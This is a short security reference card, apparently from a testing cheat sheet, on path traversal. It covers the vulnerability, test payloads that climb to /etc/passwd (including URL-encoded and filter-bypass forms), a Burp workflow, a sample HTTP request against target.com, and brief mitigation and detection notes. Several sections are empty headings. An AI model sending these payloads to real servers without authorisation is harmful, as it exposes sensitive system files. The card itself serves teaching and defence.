🟠 Path Traversal (Directory Traversal)

🧠 Description

What is Path Traversal?

Path Traversal (also known as Directory Traversal) allows attackers to access files outside the web root folder by using "../" sequences. This can expose sensitive files on the server.

🏷️ Classification

• Type: Path Traversal (CWE-22)
• OWASP: A01:2021 - Broken Access Control
• Variants: Local File Inclusion, Remote File Inclusion

🎯 Attack Surface

• ✅ File download features
• ✅ Image viewers
• ✅ Document viewers
• ✅ Load balancing features
• ✅ Template systems

⚠️ Preconditions

• Application uses file paths in parameters
• No proper validation of path input
• File access not restricted to web root

🔍 Detection

Test Payloads:

• ../etc/passwd
• ..%2F..%2F..%2Fetc%2Fpasswd
• ....//....//....//etc/passwd

🔧 Burp Workflow

1. Identify file path parameters
2. Inject ../ sequences
3. Test for file access
4. Escalate to sensitive files

⚙️ Tool Automation

💣 Basic Payloads

🚀 Advanced Payloads

📝 Proof of Concept

# Request
GET /download?file=../../etc/passwd HTTP/1.1
Host: target.com

# Response - shows passwd file content!

💥 Impact

🛡️ Mitigation

🏰 Advanced Mitigation

• Implement allowlist of permitted files
• Use realpath() to canonicalize paths
• Restrict file access to web root

📊 Monitoring

• Alert on ../ in parameters
• Monitor for sensitive file access

🔐 Security Controls

🛠️ Tools

📚 References

• OWASP: Path Traversal

🔄 Retest

⚙️ Detection

Static: Find file operations without validation. Dynamic: Fuzz with ../

🔎 Threat-Hunting

IOCs: ../ sequences in logs, sensitive file access.

🛡️ Defensive

WAF with path traversal rules.